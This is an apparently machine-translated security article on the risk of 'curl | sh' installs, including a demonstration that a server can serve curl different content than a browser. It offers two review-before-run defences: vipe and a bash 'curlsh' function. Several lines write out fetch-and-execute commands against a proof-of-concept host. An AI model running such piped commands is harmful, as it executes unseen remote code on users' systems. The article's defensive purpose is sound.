Unless you have recently installed third-party software that is of interest to developers, you are likely to be advised to install it directly from the network using the following command.
?
1 |
curl -s http: //example .com /install .sh | sh |
This article is not intended to discuss the good or bad of this approach, but to remind those who use this method, which, in addition to the obvious drawbacks, has another downside: to directly pass third-party data through the pipeline into the shell. There is now a lot of discussion about this approach, and one view that supports it is that the script to be executed is transparent-you can open the script with a browser before the command executes and simply check it.
The main purpose of this article is to demonstrate that this level of trust can be hijacked, and B) provides you with a simple way to protect yourself when using curl to install the software.
Proof of concept--it's not what it looks like.
Straight to the point, this attack is based on the following principle: the contents of the. sh file are easily verified for security, and the content seen in the browser is the same as those downloaded through curl. This hypothetical problem is used in browsers and curl two ways with different user-agent, so if someone knows this and exploits it will jeopardize this. sh file ().
So, a simple concept definition has come out: you can see all the source code on GitHub or see POC hosted on Heroku;poc is hung on a free Heroku dyno, so if you can't open it, it's probably already dead.
For a quick test, after you have checked the URL of the. sh file on your browser, simply run the following command on the terminal. If you use curl not to emit the same user-agent, the results you get will be different.
?
1 |
curl -s http: //pipe-to-sh-poc .herokuapp.com /install .sh | sh |
Solution Solutions
The simplest way is to look at the contents of each file before executing it. There are two kinds of concrete methods, the truth is similar, all in curl, after the execution of SH; Once you find a suspicious command/code, simply turn the editor off and make sure the editor exits with a non-0 error code. (For example: in Vim, you can use: CQ exit). Method 1 needs to be installed, Method 2 to enter the command when a few words. As to which one to use, see your personal preference.
Method 1) Since vipe allows you to insert commands that run the editor into a UNIX pipeline, view or modify the data passed to the subsequent program. We can use Vipe to view the contents of a file before it executes.
?
1 |
curl -s http: //pipe-to-sh-poc .herokuapp.com /install .sh | vipe | sh |
Vipe is part of the Themoreutils software package and can be installed in the following systems:
Mac OSX uses homebrew:brew install Moreutils.
Ubuntu with Apt:apt-get install Moreutils.
Other *nix systems can be installed using a software source.
Method 2) Define the bash function yourself. Locate the. bashrc file, and then copy the following code in to save it:
?
123456 |
# Safer curl | sh‘ingfunction curlsh {
file
=$(mktemp -t curlsh) || {
echo
"Failed creating file"
;
return
; }
curl -s
"$1"
> $
file
|| {
echo
"Failed to curl file"
;
return
; }
$EDITOR $
file || {
echo
"Editor quit with error code"
;
return
; }
sh $
file
;
rm
$
file
;}
|
When you call this, write:
?
1 |
curlsh http: //pipe-to-sh-poc .herokuapp.com /install .sh |
$EDITOR is the editor you choose, it will open the file before the file execution, so that you can view the contents.
Http://www.lupaworld.com/article-243631-1.html
Protect yourself from ' Curl <url> | The hazards of SH '